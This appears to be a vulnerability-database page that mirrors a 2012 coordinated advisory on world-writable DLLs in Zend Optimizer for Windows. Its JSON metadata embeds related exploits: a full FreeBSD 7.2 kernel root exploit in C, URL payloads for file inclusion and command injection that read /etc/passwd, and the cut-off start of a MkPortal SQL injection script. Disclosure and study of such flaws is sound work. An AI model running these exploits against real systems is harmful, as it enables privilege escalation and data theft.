Search...

Zend Optimizer 3.3.3 (Windows) Insecure Permissions

2012-04-04T00:00:00

ID 1337DAY-ID-17951
Type zdt
Reporter LiquidWorm
Modified 2012-04-04T00:00:00

Description

Exploit for windows platform in category local exploits

                                        
                                            Zend Optimizer 3.3.3 (Windows) Insecure Permissions


Vendor: Zend Technologies Ltd.
Product web page: http://www.zend.com

Affected version: 3.3.3* and 3.3.0*

* Note: The patch did not change the version number of the affected
product, so the updated version is still 3.3.3, but with proper permissions.

Summary: Zend Optimizer is a free application that runs the files
encoded using Zend Guard and enhances the overall performance of
your PHP applications.

Desc: The Zend Optimizer package for Windows is vulnerable to an
elevation of privileges vulnerability which can be used by a simple
user that can change the library file with a binary of choice. The
vulnerability exist due to the improper permissions, with the 'F' flag
(full control) for the 'Everyone' group, for the 'ZendExtensionManager.dll'
library file and 'ZendOptimizer.dll' which are bundled with the Zend
Optimizer (Runtime for PHP 5.2 and earlier) installation package.

Tested on: Microsoft Windows XP Professional SP3 (EN)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Vendor status:

[01.02.2012] Vulnerability discovered.
[23.02.2012] Contact with the vendor.
[23.02.2012] Vendor responds asking for details.
[24.02.2012] Sent detailed information to the vendor.
[24.02.2012] Vendor assigns appropriate team for coordination.
[27.02.2012] Vendor is analyzing the issue, working on a fix.
[27.02.2012] Asked vendor for confirmation and scheduled patch release date.
[28.02.2012] Vendor replies with confirmation of the issue.
[05.03.2012] Asked vendor for status update.
[06.03.2012] Vendor created fix for the issue, promising patch release date.
[07.03.2012] Sent coordination details to the vendor.
[14.03.2012] Asked vendor for status update.
[14.03.2012] Vendor replies.
[21.03.2012] Sent advisory release information to the vendor.
[21.03.2012] Vendor extends the patch release date.
[29.03.2012] Vendor publishes new version to address this issue.
[03.04.2012] Coordinated public security advisory released.



Advisory ID: ZSL-2012-5083
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5083.php

Zend Advisory: http://static.zend.com/topics/Zend-Optimizer-3.3.3-Release-Notes-V2.txt
               http://www.zend.com/en/products/guard/downloads



01.02.2012


---

C:\Program Files\Zend\ZendOptimizer-3.3.0\lib&gt;cacls ZendExtensionManager.dll
C:\Program Files\Zend\ZendOptimizer-3.3.0\lib\ZendExtensionManager.dll Everyone:F
                                                                       BUILTIN\Users:R
                                                                       BUILTIN\Power Users:C
                                                                       BUILTIN\Administrators:F
                                                                       NT AUTHORITY\SYSTEM:F
                                                                       TESTPC\TESTUSER:F


C:\Program Files\Zend\ZendOptimizer-3.3.0\lib&gt;cd Optimizer-3.3.0\php-5.2.x

C:\Program Files\Zend\ZendOptimizer-3.3.0\lib\Optimizer-3.3.0\php-5.2.x&gt;cacls ZendOptimizer.dll
C:\Program Files\Zend\ZendOptimizer-3.3.0\lib\Optimizer-3.3.0\php-5.2.x\ZendOptimizer.dll Everyone:F
                                                                                          BUILTIN\Users:R
                                                                                          BUILTIN\Power Users:C
                                                                                          BUILTIN\Administrators:F
                                                                                          NT AUTHORITY\SYSTEM:F
                                                                                          TESTPC\TESTUSER:F


C:\Program Files\Zend\ZendOptimizer-3.3.0\lib\Optimizer-3.3.0\php-5.2.x&gt;

---



#  0day.today [2018-01-03]  #

JSON Vulners Source

Initial Source

{"published": "2012-04-04T00:00:00", "id": "1337DAY-ID-17951", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T01:31:23", "bulletin": {"published": "2012-04-04T00:00:00", "id": "1337DAY-ID-17951", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 4.0, "modified": "2016-04-20T01:31:23"}}, "hash": "364614809f2157a29ea1bce951fbd0f6129862d7795ab4f6773a829117d23476", "description": "Exploit for windows platform in category local exploits", "type": "zdt", "lastseen": "2016-04-20T01:31:23", "edition": 1, "title": "Zend Optimizer 3.3.3 (Windows) Insecure Permissions", "href": "http://0day.today/exploit/description/17951", "modified": "2012-04-04T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/17951", "references": [], "reporter": "LiquidWorm", "sourceData": "Zend Optimizer 3.3.3 (Windows) Insecure Permissions\r\n\r\n\r\nVendor: Zend Technologies Ltd.\r\nProduct web page: http://www.zend.com\r\n\r\nAffected version: 3.3.3* and 3.3.0*\r\n\r\n* Note: The patch did not change the version number of the affected\r\nproduct, so the updated version is still 3.3.3, but with proper permissions.\r\n\r\nSummary: Zend Optimizer is a free application that runs the files\r\nencoded using Zend Guard and enhances the overall performance of\r\nyour PHP applications.\r\n\r\nDesc: The Zend Optimizer package for Windows is vulnerable to an\r\nelevation of privileges vulnerability which can be used by a simple\r\nuser that can change the library file with a binary of choice. The\r\nvulnerability exist due to the improper permissions, with the 'F' flag\r\n(full control) for the 'Everyone' group, for the 'ZendExtensionManager.dll'\r\nlibrary file and 'ZendOptimizer.dll' which are bundled with the Zend\r\nOptimizer (Runtime for PHP 5.2 and earlier) installation package.\r\n\r\nTested on: Microsoft Windows XP Professional SP3 (EN)\r\n\r\n\r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n\r\n\r\nVendor status:\r\n\r\n[01.02.2012] Vulnerability discovered.\r\n[23.02.2012] Contact with the vendor.\r\n[23.02.2012] Vendor responds asking for details.\r\n[24.02.2012] Sent detailed information to the vendor.\r\n[24.02.2012] Vendor assigns appropriate team for coordination.\r\n[27.02.2012] Vendor is analyzing the issue, working on a fix.\r\n[27.02.2012] Asked vendor for confirmation and scheduled patch release date.\r\n[28.02.2012] Vendor replies with confirmation of the issue.\r\n[05.03.2012] Asked vendor for status update.\r\n[06.03.2012] Vendor created fix for the issue, promising patch release date.\r\n[07.03.2012] Sent coordination details to the vendor.\r\n[14.03.2012] Asked vendor for status update.\r\n[14.03.2012] Vendor replies.\r\n[21.03.2012] Sent advisory release information to the vendor.\r\n[21.03.2012] Vendor extends the patch release date.\r\n[29.03.2012] Vendor publishes new version to address this issue.\r\n[03.04.2012] Coordinated public security advisory released.\r\n\r\n\r\n\r\nAdvisory ID: ZSL-2012-5083\r\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5083.php\r\n\r\nZend Advisory: http://static.zend.com/topics/Zend-Optimizer-3.3.3-Release-Notes-V2.txt\r\n http://www.zend.com/en/products/guard/downloads\r\n\r\n\r\n\r\n01.02.2012\r\n\r\n\r\n---\r\n\r\nC:\\Program Files\\Zend\\ZendOptimizer-3.3.0\\lib>cacls ZendExtensionManager.dll\r\nC:\\Program Files\\Zend\\ZendOptimizer-3.3.0\\lib\\ZendExtensionManager.dll Everyone:F\r\n BUILTIN\\Users:R\r\n BUILTIN\\Power Users:C\r\n BUILTIN\\Administrators:F\r\n NT AUTHORITY\\SYSTEM:F\r\n TESTPC\\TESTUSER:F\r\n\r\n\r\nC:\\Program Files\\Zend\\ZendOptimizer-3.3.0\\lib>cd Optimizer-3.3.0\\php-5.2.x\r\n\r\nC:\\Program Files\\Zend\\ZendOptimizer-3.3.0\\lib\\Optimizer-3.3.0\\php-5.2.x>cacls ZendOptimizer.dll\r\nC:\\Program Files\\Zend\\ZendOptimizer-3.3.0\\lib\\Optimizer-3.3.0\\php-5.2.x\\ZendOptimizer.dll Everyone:F\r\n BUILTIN\\Users:R\r\n BUILTIN\\Power Users:C\r\n BUILTIN\\Administrators:F\r\n NT AUTHORITY\\SYSTEM:F\r\n TESTPC\\TESTUSER:F\r\n\r\n\r\nC:\\Program Files\\Zend\\ZendOptimizer-3.3.0\\lib\\Optimizer-3.3.0\\php-5.2.x>\r\n\r\n---\r\n\r\n\n\n# 0day.today [2016-04-20] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "caf3146a0321319b77bb5a4b8df50353", "key": "modified"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "fa50b16abf756a36669c7d468a03e011", "key": "sourceData"}, {"hash": "7b5a0e810ee22f96e22a367a2b520b91", "key": "sourceHref"}, {"hash": "7505c0746ddbbcecfcf8857f2822fe7a", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "97cb93618153949f7a9f8f3a05794670", "key": "title"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "3aa73750dff5f1c896c4435c28429fd5", "key": "description"}, {"hash": "91aad38014ecd6c9585176f5bacd2246", "key": "reporter"}, {"hash": "caf3146a0321319b77bb5a4b8df50353", "key": "published"}], "objectVersion": "1.0"}}], "description": "Exploit for windows platform in category local exploits", "hash": "52c70efa52f9695467db7638482f2b2db35a27ce570267bf72bde184a77ede3d", "enchantments": {"score": {"value": -0.2, "vector": "NONE", "modified": "2018-01-03T13:08:17"}, "dependencies": {"references": [{"type": "zeroscience", "idList": ["ZSL-2012-5083"]}, {"type": "zdt", "idList": ["1337DAY-ID-5083"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:8125", "SECURITYVULNS:DOC:17951"]}], "modified": "2018-01-03T13:08:17"}, "vulnersScore": -0.2}, "type": "zdt", "lastseen": "2018-01-03T13:08:17", "edition": 2, "title": "Zend Optimizer 3.3.3 (Windows) Insecure Permissions", "href": "https://0day.today/exploit/description/17951", "modified": "2012-04-04T00:00:00", "bulletinFamily": "exploit", "viewCount": 4, "cvelist": [], "sourceHref": "https://0day.today/exploit/17951", "references": [], "reporter": "LiquidWorm", "sourceData": "Zend Optimizer 3.3.3 (Windows) Insecure Permissions\r\n\r\n\r\nVendor: Zend Technologies Ltd.\r\nProduct web page: http://www.zend.com\r\n\r\nAffected version: 3.3.3* and 3.3.0*\r\n\r\n* Note: The patch did not change the version number of the affected\r\nproduct, so the updated version is still 3.3.3, but with proper permissions.\r\n\r\nSummary: Zend Optimizer is a free application that runs the files\r\nencoded using Zend Guard and enhances the overall performance of\r\nyour PHP applications.\r\n\r\nDesc: The Zend Optimizer package for Windows is vulnerable to an\r\nelevation of privileges vulnerability which can be used by a simple\r\nuser that can change the library file with a binary of choice. The\r\nvulnerability exist due to the improper permissions, with the 'F' flag\r\n(full control) for the 'Everyone' group, for the 'ZendExtensionManager.dll'\r\nlibrary file and 'ZendOptimizer.dll' which are bundled with the Zend\r\nOptimizer (Runtime for PHP 5.2 and earlier) installation package.\r\n\r\nTested on: Microsoft Windows XP Professional SP3 (EN)\r\n\r\n\r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n\r\n\r\nVendor status:\r\n\r\n[01.02.2012] Vulnerability discovered.\r\n[23.02.2012] Contact with the vendor.\r\n[23.02.2012] Vendor responds asking for details.\r\n[24.02.2012] Sent detailed information to the vendor.\r\n[24.02.2012] Vendor assigns appropriate team for coordination.\r\n[27.02.2012] Vendor is analyzing the issue, working on a fix.\r\n[27.02.2012] Asked vendor for confirmation and scheduled patch release date.\r\n[28.02.2012] Vendor replies with confirmation of the issue.\r\n[05.03.2012] Asked vendor for status update.\r\n[06.03.2012] Vendor created fix for the issue, promising patch release date.\r\n[07.03.2012] Sent coordination details to the vendor.\r\n[14.03.2012] Asked vendor for status update.\r\n[14.03.2012] Vendor replies.\r\n[21.03.2012] Sent advisory release information to the vendor.\r\n[21.03.2012] Vendor extends the patch release date.\r\n[29.03.2012] Vendor publishes new version to address this issue.\r\n[03.04.2012] Coordinated public security advisory released.\r\n\r\n\r\n\r\nAdvisory ID: ZSL-2012-5083\r\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5083.php\r\n\r\nZend Advisory: http://static.zend.com/topics/Zend-Optimizer-3.3.3-Release-Notes-V2.txt\r\n http://www.zend.com/en/products/guard/downloads\r\n\r\n\r\n\r\n01.02.2012\r\n\r\n\r\n---\r\n\r\nC:\\Program Files\\Zend\\ZendOptimizer-3.3.0\\lib>cacls ZendExtensionManager.dll\r\nC:\\Program Files\\Zend\\ZendOptimizer-3.3.0\\lib\\ZendExtensionManager.dll Everyone:F\r\n BUILTIN\\Users:R\r\n BUILTIN\\Power Users:C\r\n BUILTIN\\Administrators:F\r\n NT AUTHORITY\\SYSTEM:F\r\n TESTPC\\TESTUSER:F\r\n\r\n\r\nC:\\Program Files\\Zend\\ZendOptimizer-3.3.0\\lib>cd Optimizer-3.3.0\\php-5.2.x\r\n\r\nC:\\Program Files\\Zend\\ZendOptimizer-3.3.0\\lib\\Optimizer-3.3.0\\php-5.2.x>cacls ZendOptimizer.dll\r\nC:\\Program Files\\Zend\\ZendOptimizer-3.3.0\\lib\\Optimizer-3.3.0\\php-5.2.x\\ZendOptimizer.dll Everyone:F\r\n BUILTIN\\Users:R\r\n BUILTIN\\Power Users:C\r\n BUILTIN\\Administrators:F\r\n NT AUTHORITY\\SYSTEM:F\r\n TESTPC\\TESTUSER:F\r\n\r\n\r\nC:\\Program Files\\Zend\\ZendOptimizer-3.3.0\\lib\\Optimizer-3.3.0\\php-5.2.x>\r\n\r\n---\r\n\r\n\n\n# 0day.today [2018-01-03] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "3aa73750dff5f1c896c4435c28429fd5", "key": "description"}, {"hash": "428115348079cfe8d67ca2a956bd6f8c", "key": "href"}, {"hash": "caf3146a0321319b77bb5a4b8df50353", "key": "modified"}, {"hash": "caf3146a0321319b77bb5a4b8df50353", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "91aad38014ecd6c9585176f5bacd2246", "key": "reporter"}, {"hash": "f968ea1cc0af8875ea6f39f7180236a3", "key": "sourceData"}, {"hash": "699f2a6e0ae8486bd2a50b91aa9b52e5", "key": "sourceHref"}, {"hash": "97cb93618153949f7a9f8f3a05794670", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}

{"zeroscience": [{"lastseen": "2019-11-11T16:11:38", "bulletinFamily": "exploit", "description": "Title: Zend Optimizer 3.3.3 (Windows) Insecure Permissions \nAdvisory ID: [ZSL-2012-5083](<ZSL-2012-5083.php>) \nType: Local \nImpact: Privilege Escalation \nRisk: (2/5) \nRelease Date: 03.04.2012 \n\n\n##### Summary\n\nZend Optimizer is a free application that runs the files encoded using Zend Guard and enhances the overall performance of your PHP applications. \n\n##### Description\n\nThe Zend Optimizer package for Windows is vulnerable to an elevation of privileges vulnerability which can be used by a simple user that can change the library file with a binary of choice. The vulnerability exist due to the improper permissions, with the 'F' flag (full control) for the 'Everyone' group, for the 'ZendExtensionManager.dll' library file and 'ZendOptimizer.dll' which are bundled with the Zend Optimizer (Runtime for PHP 5.2 and earlier) installation package. \n\n##### Vendor\n\nZend Technologies Ltd. - <http://www.zend.com>\n\n##### Affected Version\n\n3.3.3* and 3.3.0* \n \n***** Note: The patch did not change the version number of the affected product, so the updated version is still 3.3.3, but with proper permissions. \n\n##### Tested On\n\nMicrosoft Windows XP Professional SP3 (EN) \n\n##### Vendor Status\n\n[01.02.2012] Vulnerability discovered. \n[23.02.2012] Contact with the vendor. \n[23.02.2012] Vendor responds asking for details. \n[24.02.2012] Sent detailed information to the vendor. \n[24.02.2012] Vendor assigns appropriate team for coordination. \n[27.02.2012] Vendor is analyzing the issue, working on a fix. \n[27.02.2012] Asked vendor for confirmation and scheduled patch release date. \n[28.02.2012] Vendor replies with confirmation of the issue. \n[05.03.2012] Asked vendor for status update. \n[06.03.2012] Vendor created fix for the issue, promising patch release date. \n[07.03.2012] Sent coordination details to the vendor. \n[14.03.2012] Asked vendor for status update. \n[14.03.2012] Vendor replies. \n[21.03.2012] Sent advisory release information to the vendor. \n[21.03.2012] Vendor extends the patch release date. \n[29.03.2012] Vendor publishes new version to address this issue. \n[03.04.2012] Coordinated public security advisory released. \n\n##### PoC\n\n[zendoptimizer_iperms.txt](<../../codes/zendoptimizer_iperms.txt>)\n\n##### Credits\n\nVulnerability discovered by Gjoko Krstic - <[gjoko@zeroscience.mk](<mailto:gjoko@zeroscience.mk>)>\n\n##### References\n\n[1] <http://static.zend.com/topics/Zend-Optimizer-3.3.3-Release-Notes-V2.txt> \n[2] <http://www.zend.com/en/products/guard/downloads> \n[3] <http://www.securityfocus.com/bid/52866> \n[4] <http://packetstormsecurity.org/files/111530> \n[5] <http://cxsecurity.com/issue/WLB-2012040044> \n[6] <http://secunia.com/advisories/48642/> \n[7] <http://www.osvdb.org/show/osvdb/80935> \n[8] <http://xforce.iss.net/xforce/xfdb/74580>\n\n##### Changelog\n\n[03.04.2012] - Initial release \n[04.04.2012] - Added reference [4] and [5] \n[06.04.2012] - Added reference [6] and [7] \n[20.04.2012] - Added reference [8] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <http://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "modified": "2012-04-03T00:00:00", "published": "2012-04-03T00:00:00", "id": "ZSL-2012-5083", "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2012-5083.php", "title": "Zend Optimizer 3.3.3 (Windows) Insecure Permissions", "type": "zeroscience", "sourceData": "<html><head><title>403 Nothing to see.</title>\n<link rel=\"Shortcut Icon\" href=\"favicon.ico\" type=\"image/x-icon\">\n<style type=\"text/css\">\n\n</style>\n</head>\n<body bgcolor=black>\n<center>\n<font color=\"#7E88A3\" size=\"2\">\n<br /><br />\n<h1>403 Nothing to see.</h1>\n\nYou do not have the powah for this request /403.shtml<br /><br />\n<font size=\"2\"><a href=\"https://www.zeroscience.mk\">https://www.zeroscience.mk</a></font>\n</font></center>\n</body></html>", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "http://zeroscience.mk/en/vulnerabilities/../../codes/zendoptimizer_iperms.txt"}], "zdt": [{"lastseen": "2018-01-05T01:12:40", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category local exploits", "modified": "2009-10-08T00:00:00", "published": "2009-10-08T00:00:00", "id": "1337DAY-ID-8125", "href": "https://0day.today/exploit/description/8125", "type": "zdt", "title": "FreeBSD 7.2 VFS/devfs race condition exploit", "sourceData": "============================================\r\nFreeBSD 7.2 VFS/devfs race condition exploit\r\n============================================\r\n\r\n\r\n# Title: FreeBSD 7.2 VFS/devfs race condition exploit\r\n# CVE-ID: ()\r\n# OSVDB-ID: ()\r\n# Author: Przemyslaw Frasunek\r\n# Published: 2009-10-08\r\n# Verified: yes\r\n\r\nview source\r\nprint?\r\n#if 0\r\nFreeBSD 7.2 and below (including 6.4) are vulnerable to race condition in VFS\r\nand devfs code, resulting in NULL pointer dereference. In contrast to pipe race\r\ncondition, this vulnerability is actually much harder to exploit.\r\n \r\nDue to uninitalised value in devfs_open(), following function is called with\r\nfp->f_vnode = 0:\r\n \r\nstatic int\r\ndevfs_fp_check(struct file *fp, struct cdev **devp, struct cdevsw **dswp)\r\n{\r\n \r\n *dswp = devvn_refthread(fp->f_vnode, devp);\r\n if (*devp != fp->f_data) {\r\n if (*dswp != NULL)\r\n[6] dev_relthread(*devp);\r\n return (ENXIO);\r\n }\r\n KASSERT((*devp)->si_refcount > 0,\r\n (\"devfs: un-referenced struct cdev *(%s)\", devtoname(*devp)));\r\n if (*dswp == NULL)\r\n return (ENXIO);\r\n curthread->td_fpop = fp;\r\n return (0);\r\n}\r\n \r\n \r\nstruct cdevsw *\r\ndevvn_refthread(struct vnode *vp, struct cdev **devp)\r\n{\r\n struct cdevsw *csw;\r\n struct cdev_priv *cdp;\r\n \r\n mtx_assert(&devmtx, MA_NOTOWNED);\r\n csw = NULL;\r\n dev_lock();\r\n[1] *devp = vp->v_rdev;\r\n if (*devp != NULL) {\r\n[2] cdp = (*devp)->si_priv;\r\n[3] if ((cdp->cdp_flags & CDP_SCHED_DTR) == 0) {\r\n[4] csw = (*devp)->si_devsw;\r\n if (csw != NULL)\r\n[5] (*devp)->si_threadcount++;\r\n }\r\n }\r\n dev_unlock();\r\n return (csw);\r\n}\r\n \r\nIn [1] vp is dereferenced, resulting in user-controllable *devp pointer (loaded\r\nfrom *0x1c). If values dereferenced in [2], [3] and [4] are reachable, at [5] we\r\nhave memory write at user-controllable address. Unfortunately, the value is\r\ndecremented in [6].\r\n \r\nIn my exploit, I use si_threadcount incrementation to modify kernel code in\r\ndevfs_fp_check(). Opcode at 0xc076c64b is \"je\" (0x74). After incrementation it\r\nchanges to 0x75, which is \"jne\". Such modification results in not calling\r\ndev_relthread() at [6] and eventually leads to function pointer call in\r\ndevfs_kqfilter_f().\r\n \r\nThe following exploit code works only on default 7.2 kernel, due to hardcoded\r\naddresses:\r\n#endif\r\n \r\n/* 14.09.2009, babcia padlina\r\n * FreeBSD 7.2 devfs kevent() race condition exploit\r\n *\r\n * works only on multiprocessor systems\r\n * compile with -lpthread\r\n */\r\n \r\n#define JE_ADDRESS 0xc076c62b\r\n \r\n/* location of \"je\" (0x74) opcode in devfs_fp_check() - it will be incremented\r\n * becoming \"jne\" (0x75), so error won't be returned in devfs_vnops.c:648\r\n * and junk function pointer will be called in devfs_vnops.c:650\r\n *\r\n * you can obtain it using:\r\n * $ objdump -d /boot/kernel/kernel | grep -A 50 \\<devfs_fp_check\\>: | grep je | head -n 1 | cut -d: -f1\r\n */\r\n \r\n#include <pthread.h>\r\n \r\n#define _KERNEL\r\n \r\n#include <sys/param.h>\r\n#include <sys/conf.h>\r\n#include <sys/ucred.h>\r\n#include <fs/devfs/devfs_int.h>\r\n \r\n#include <sys/types.h>\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n#include <sys/event.h>\r\n#include <sys/timespec.h>\r\n#include <fcntl.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n#include <sys/mman.h>\r\n#include <sys/proc.h>\r\n \r\nint fd, kq;\r\nstruct kevent kev, ke;\r\nstruct timespec timeout;\r\nvolatile int gotroot = 0;\r\n \r\nstatic void kernel_code(void) {\r\n struct thread *thread;\r\n gotroot = 1;\r\n asm(\r\n \"movl %%fs:0, %0\"\r\n : \"=r\"(thread)\r\n );\r\n thread->td_proc->p_ucred->cr_uid = 0;\r\n thread->td_proc->p_ucred->cr_prison = NULL;\r\n \r\n return;\r\n}\r\n \r\nstatic void code_end(void) {\r\n return;\r\n}\r\n \r\nvoid do_thread(void) {\r\n usleep(100);\r\n \r\n while (!gotroot) {\r\n memset(&kev, 0, sizeof(kev));\r\n EV_SET(&kev, fd, EVFILT_READ, EV_ADD, 0, 0, NULL);\r\n \r\n if (kevent(kq, &kev, 1, &ke, 1, &timeout) < 0)\r\n perror(\"kevent\");\r\n \r\n }\r\n \r\n return;\r\n}\r\n \r\nvoid do_thread2(void) {\r\n while(!gotroot) {\r\n /* any devfs node will work */\r\n if ((fd = open(\"/dev/null\", O_RDONLY, 0600)) < 0)\r\n perror(\"open\");\r\n \r\n close(fd);\r\n }\r\n \r\n return;\r\n}\r\n \r\nint main(void) {\r\n int i;\r\n pthread_t pth, pth2;\r\n struct cdev devp;\r\n char *p;\r\n unsigned long *ap;\r\n \r\n /* 0x1c used for vp->v_rdev dereference, when vp=0 */\r\n /* 0xa5610e8 used for vp->r_dev->si_priv dereference */\r\n /* 0x37e3e1c is junk dsw->d_kqfilter() in devfs_vnops.c:650 */\r\n \r\n unsigned long pages[] = { 0x0, 0xa561000, 0x37e3000 };\r\n unsigned long sizes[] = { 0xf000, 0x1000, 0x1000 };\r\n \r\n for (i = 0; i < sizeof(pages) / sizeof(unsigned long); i++) {\r\n printf(\"[*] allocating %p @ %p\\n\", sizes[i], pages[i]);\r\n if (mmap((void *)pages[i], sizes[i], PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANON | MAP_FIXED, -1, 0) == MAP_FAILED) {\r\n perror(\"mmap\");\r\n return -1;\r\n }\r\n }\r\n \r\n *(unsigned long *)0x1c = (unsigned long)(JE_ADDRESS - ((char *)&devp.si_threadcount - (char *)&devp));\r\n \r\n p = (char *)pages[2];\r\n ap = (unsigned long *)p;\r\n \r\n for (i = 0; i < sizes[2] / 4; i++)\r\n *ap++ = (unsigned long)&kernel_code;\r\n \r\n if ((kq = kqueue()) < 0) {\r\n perror(\"kqueue\");\r\n return -1;\r\n }\r\n \r\n pthread_create(&pth, NULL, (void *)do_thread, NULL);\r\n pthread_create(&pth2, NULL, (void *)do_thread2, NULL);\r\n \r\n timeout.tv_sec = 0;\r\n timeout.tv_nsec = 1;\r\n \r\n printf(\"waiting for root...\\n\");\r\n i = 0;\r\n \r\n while (!gotroot && i++ < 10000)\r\n usleep(100);\r\n \r\n setuid(0);\r\n \r\n if (getuid()) {\r\n printf(\"failed - system patched or not MP\\n\");\r\n return -1;\r\n }\r\n \r\n execl(\"/bin/sh\", \"sh\", NULL);\r\n \r\n return 0;\r\n}\r\n\r\n\r\r\n\n\n# 0day.today [2018-01-04] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/8125"}, {"lastseen": "2018-03-01T03:36:07", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2009-04-21T00:00:00", "published": "2009-04-21T00:00:00", "id": "1337DAY-ID-5083", "href": "https://0day.today/exploit/description/5083", "type": "zdt", "title": "NotFTP 1.3.1 (newlang) Local File Inclusion Vulnerability", "sourceData": "=========================================================\r\nNotFTP 1.3.1 (newlang) Local File Inclusion Vulnerability\r\n=========================================================\r\n\r\n\r\nNotFTP 1.3.1 => Local file include\r\nhttp://sourceforge.net/projects/notftp/\r\n\r\n\r\nAuthor: Kacper\r\n\r\nDC++ Hub address: bluber-hub.no-ip.biz:2008\r\n\r\nVuln:\r\n\r\nFile config.php:\r\n\r\n#########################################################################\r\n# This is where we decide what language to use. Don't mess with this\r\n# either.\r\n#########################################################################\r\n\r\nif (isset($newlang))\r\n{\r\n require_once(\"lib/lang/\".$languages[$newlang][\"file\"]);\r\n}\r\nelseif (isset($_COOKIE[\"notftplang\"]))\r\n{\r\n require_once(\"lib/lang/\".$languages[$_COOKIE[\"notftplang\"]][\"file\"]);\r\n}\r\nelse\r\n{\r\n require_once(\"lib/lang/\".$languages[DEFAULTLANG][\"file\"]);\r\n}\r\n\r\n# NotFTP version. Changing this would be silly. So don't.\r\n\r\nPoC:\r\n\r\nhttp://site.pl/path/config.php?newlang=kacper&languages[kacper][file]=../../../../../etc/passwd\r\n\r\nThe End\r\n\r\n========= \r\n\r\n\r\n\n# 0day.today [2018-03-01] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/5083"}, {"lastseen": "2018-04-14T01:49:02", "bulletinFamily": "exploit", "description": "Exploit for cgi platform in category web applications", "modified": "2007-11-22T00:00:00", "published": "2007-11-22T00:00:00", "id": "1337DAY-ID-2305", "href": "https://0day.today/exploit/description/2305", "type": "zdt", "title": "KB-Bestellsystem (kb_whois.cgi) Command Execution Vulnerability", "sourceData": "===============================================================\r\nKB-Bestellsystem (kb_whois.cgi) Command Execution Vulnerability\r\n===============================================================\r\n\r\n\r\n\r\n\"KB-Bestellsystem\" is a domain order system written in Perl.\r\nThe \"domain\" and \"tld\" parameters in \"kb_whois.cgi\" are not filtering shell metacharacters.\r\n\r\nThe following examples will show you the /etc/passwd file:\r\n\r\nhttp://targethost.com/kb-bestellsystem/kb_whois.cgi?action=check_owner&domain=;cat%20/etc/passwd;&tld=.com&tarrif=\r\nhttp://targethost.com/kb-bestellsystem/kb_whois.cgi?action=check_owner&domain=google&tld=.com;cat /etc/passwd;&tarrif=\r\n\r\n<< Greetz Zero X >>\r\n\r\n\r\n\n# 0day.today [2018-04-14] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/2305"}, {"lastseen": "2018-01-02T09:22:54", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2007-07-12T00:00:00", "published": "2007-07-12T00:00:00", "id": "1337DAY-ID-2021", "href": "https://0day.today/exploit/description/2021", "type": "zdt", "title": "MkPortal <= 1.1.1 reviews / gallery modules SQL Injection Exploit", "sourceData": "=================================================================\r\nMkPortal <= 1.1.1 reviews / gallery modules SQL Injection Exploit\r\n=================================================================\r\n\r\n\r\n\r\n<?php\r\n\r\n/*\r\n[i] MkPortal \"reviews\" and \"gallery\" modules SQL Injection Exploit\r\n[i] Vulnerable versions: MkPortal <= 1.1.1\r\n[i] Bug discovered by: Coloss\r\n[i] Exploit by: Coloss\r\n[i] Date: 06.07.2007\r\n[i] This is priv8 not for kids\r\n\r\n[Notes]\r\nAt this time MkPortal 1.1.1 is the latest stable release\r\nCurrently implemented: phpbb, smf and mybb\r\n*/\r\n\r\n\r\n$exptime = 3600;\r\n$stcnt = 300000;\r\n$maxnull = 5;\r\n\r\n$opts = getopt(\"u:U:P:f:m:d:o:\");\r\n\r\n$vars = array ( \"phpbb\", \"1 UNION SELECT %s FROM phpbb_users WHERE user_id=2\",\r\n \"phpbb_sid\", \"1 UNION SELECT %s FROM phpbb_sessions WHERE session_user_id=2 ORDER BY descrizione DESC LIMIT 1\",\r\n \"smf\", \"1 UNION SELECT %s FROM smf_members WHERE ID_MEMBER=1\",\r\n \"mybb\", \"1 UNION SELECT %s FROM mybb_users WHERE uid=1\",\r\n);\r\n\r\n\r\nprint\r\n\"[i] MkPortal \\\"reviews\\\" and \\\"gallery\\\" modules SQL Injection Exploit\r\n[i] Vulnerable versions: MkPortal <= 1.1.1\r\n[i] Bug discovered by: Coloss\r\n[i] 